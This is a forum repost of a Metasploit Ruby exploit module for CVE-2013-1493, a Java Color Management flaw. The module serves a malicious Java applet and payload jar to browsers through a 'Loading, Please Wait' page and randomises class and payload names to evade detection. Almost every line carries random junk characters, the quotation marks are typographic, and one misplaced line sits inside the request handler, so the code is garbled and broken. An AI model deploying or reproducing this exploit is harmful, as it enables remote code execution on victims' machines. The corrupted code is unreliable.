##
2 k- J& \2 n0 U! [) s# l& k% q: {3 p( L |9 k
# This file is part of the Metasploit Framework and may be subject to
; ~. P8 f; e$ U5 i/ v" y( Y# redistribution and commercial restrictions. Please see the Metasploit
8 s; ~9 z l, G# web site for more information on licensing and terms of use.
4 N8 v$ p' H! V1 j0 G# P/ [# http://metasploit.com/2 C8 p9 y* m* M z. w) }
##2 x6 J: V4 [4 [4 l% Q8 q
require ‘msf/core’, w3 h' G: m `
require ‘rex’
) b7 L* a! f+ O. Q, ~7 _class Metasploit3 < Msf::Exploit::Remote
/ d- G7 q- c8 Q6 \' hRank = NormalRanking) W& V# U- D& q2 ~% z
include Msf::Exploit::Remote::HttpServer::HTML5 N( G G; G s
include Msf::Exploit::EXE
r! D- p+ [0 I l& s; j% g u( P2 h5 Tinclude Msf::Exploit::Remote::BrowserAutopwn: h6 T7 Q; x3 d& b9 X2 J7 `1 x
autopwn_info({ :javascript => false })+ E H, J/ F' E! Y
def initialize( info = {} )
7 l. g! x# B# ?% E, ?super( update_info( info,) z6 K" b' ]4 Y- T" L6 Z
‘Name’ => ‘Java CMM Remote Code Execution’,# N- \8 c6 k8 K& K" ?
‘Description’ => %q{
6 c+ e& M( Q$ _/ qThis module abuses the Color Management classes from a Java Applet to run8 v9 K* t" `3 d F& k' J! _/ K
arbitrary Java code outside of the sandbox as exploited in the wild in February% k: p( s& D+ V6 Q* f
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
& g3 E! J1 d. Q7 land earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" P; W/ c' |4 C7 Dsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java5 B9 \0 v" w. w2 y% Z) e) E5 v0 m9 H
warning in order to run the malicious applet.
1 J, m! U F* I$ L. m( s. m% F},
0 D* V7 M$ D" h& V: [& z H$ b0 C‘License’ => MSF_LICENSE,7 x4 ^8 m j' `) Z
‘Author’ =>( U, ^2 Y1 w/ t6 f8 I9 v- K2 z* X8 m
'Unknown', # Vulnerability discovery and Exploit* [* P$ S" e3 g( ?5 W
'juan vazquez' # Metasploit module (just ported the published exploit)
, E! M* o) w- v$ ?1 O],3 o$ \7 r) E) c( A; I5 J- Y- z
‘References’ =>) m: S) f2 g, b" `/ N* N: Z
[
, d) r% t5 D6 U8 I9 v* C+ i8 G[ 'CVE', '2013-1493' ],* W: y/ [; Z! {/ ^( B. r% d* [
[ 'OSVDB', '90737' ],: e: S+ E% C+ G! h* r) \( W
[ 'BID', '58238' ],
/ p$ ^0 \. b8 [8 l/ i' q4 K[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
F6 u: z1 U/ C+ d( ~[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
- J1 h% G1 T& z# @[ 'URL', 'http://pastie.org/pastes/6581034' ]) {4 B, \. D1 K1 O& ^$ `
]," O( W. N/ ?( \8 ? p# U
‘Platform’ => [ 'win', 'java' ],
( H& E5 {* ~0 q* \9 S‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },6 Y% A; w( e3 n x8 x* K, w
‘Targets’ =>
0 H& e% R" z- m& t$ _( C- q% O[
) o; t5 g4 h% _* J H% s[ 'Generic (Java Payload)',: y' u! D0 W, F5 s4 E
{
K: x( ?4 v" `- w) X2 k'Platform' => 'java',2 p/ H2 a; C: ]# N
'Arch' => ARCH_JAVA1 {( s( ]' ]8 W: S; h* |5 a* d
}
" c o, O2 K1 r2 H3 a! e% x],
$ u4 D8 U1 [% v- k: P1 u[ 'Windows x86 (Native Payload)',7 z/ B* i2 a1 ]) u" A j; H
{
: t7 t! S6 D1 e: \$ t$ a* E7 B* \/ R'Platform' => 'win',- r; O' G5 j7 M2 L- s# X/ I/ T
'Arch' => ARCH_X86
3 Q$ Z2 R3 j7 t3 F( @8 f}# B) _! n; n" X1 ^* }& j( f& r2 ]
] w6 C3 f4 n8 h( n8 @
],
2 y( ?: x3 I9 Q. d) {( n# O% f‘‘DisclosureDate’ => ‘Mar 01 2013′
9 M6 N1 [/ I3 l/ K) P, ~: u))5 p- D. z! g E( A. O1 j. A) Q
end$ j2 B( D# e) h# I) K+ s
def setup
. v5 d4 s: `( Y; }3 F" o9 qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)+ _* |) C$ i$ K2 i* `6 k4 R" `. y. h. _
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" ? l3 L7 I$ q0 Q* J+ A# g9 s0 m3 `* W
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
6 z6 S7 X3 T0 \5 b, M5 j) g@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
* V M" t0 p' mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
& v. y+ V+ H6 F. s@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }' b, _; b% T0 @* D6 X$ X* [6 I
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
( g: r; n& v4 R- s* W7 r@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }0 \5 s7 _! r- \" M# _9 l% N5 B
@init_class_name = rand_text_alpha(“Init”.length)# k% L& O* o% |% E) y( K
@init_class.gsub!(“Init”, @init_class_name)
5 T# Y& p: V3 m& fsuper
% T( {" F+ O% Iend
' F2 L, C" q" L6 F/ Q) [- f1 D& Hdef on_request_uri(cli, request)- j- A1 ?. z' @! C/ Z& h
print_status(“handling request for #{request.uri}”)- l, S. C) d- f
case request.uri
4 C+ ]8 T7 r( c2 T& A) iwhen /\.jar$/i
0 K6 l7 ~0 M9 ?2 f2 T% ?& h; Njar = payload.encoded_jar X( j6 I; z" E% r
jar.add_file(“#{@init_class_name}.class”, @init_class)
2 y4 Z) }! d5 H4 \3 X8 e4 A, h, mjar.add_file(“Leak.class”, @leak_class): H( r& g" T& r9 K7 V f
jar.add_file(“MyBufferedImage.class”, @buffered_image_class) q+ n0 B3 w* _8 ^3 M
jar.add_file(“MyColorSpace.class”, @color_space_class)
( E3 \8 S# [5 ?2 ]DefaultTarget’ => 1, ^( h( R) R1 g* m) w* x! t# k4 m( A% r
metasploit_str = rand_text_alpha(“metasploit”.length)
6 Q% y) D0 E( U6 o( I$ I: }payload_str = rand_text_alpha(“payload”.length)
0 C' }% @# o& _jar.entries.each { |entry|1 y. L" B5 Z. a+ T% w, v% M. Z+ i
entry.name.gsub!(“metasploit”, metasploit_str)
8 e& s z* T0 {- G4 o# f/ g/ a' a; ~entry.name.gsub!(“Payload”, payload_str), Z& @2 j' z N5 F5 K
entry.data = entry.data.gsub(“metasploit”, metasploit_str)5 D7 K7 G8 z( {0 w& @- S9 P
entry.data = entry.data.gsub(“Payload”, payload_str)
; A& z7 b2 G; f) z}
+ B, t- t7 c5 P' S) Z4 Cjar.build_manifest
' |. F8 p2 m" k% |' C2 n" }; q1 Bsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })/ a& `& H+ l3 Q
when /\/$/
# P9 Q3 t0 g; k' f: m9 L7 y6 v Epayload = regenerate_payload(cli)! j/ D m" t: q- A% c" c% Y0 U
if not payload, H4 \$ V. I8 S5 D0 L. |2 D0 N/ v
print_error(“Failed to generate the payload.”)! ^- }& k/ d$ R$ x
send_not_found(cli)- B1 ^4 z9 v& B" Y, _5 y7 V
return
+ ?$ ]2 P& E( N. A, xend
+ G4 D- c) W2 _0 k5 Isend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
$ B, {3 y# M) n1 G# u+ Jelse+ S5 z! _( c4 t0 \: E% X# h
send_redirect(cli, get_resource() + ‘/’, ”)
0 C4 _3 I, P( P. h n% p5 c$ ?end
# J9 e Z. y( N/ N( b, c8 h; Rend
; I F$ {# y$ O% f0 ]0 l% Mdef generate_html
1 L& D" U# m* [/ G, ?html = %Q|<html><head><title>Loading, Please Wait…</title></head>|6 n0 P- x% A* @4 L3 G" ^
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
. L' F- C# L- ?html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|' G: L) ~# {. d8 N7 }" ~
html += %Q|</applet></body></html>|
" {+ v% x$ A u5 rreturn html
9 O4 x/ l2 V U& U2 R' R. Send
. l( X" [3 G9 [7 p, c" z2 @; oend. ]3 B1 D V9 B- \' I
end
' H1 w. Q8 S0 ^; g0 k |
发表于 2013-4-4 17:31:17
收藏
支持
反对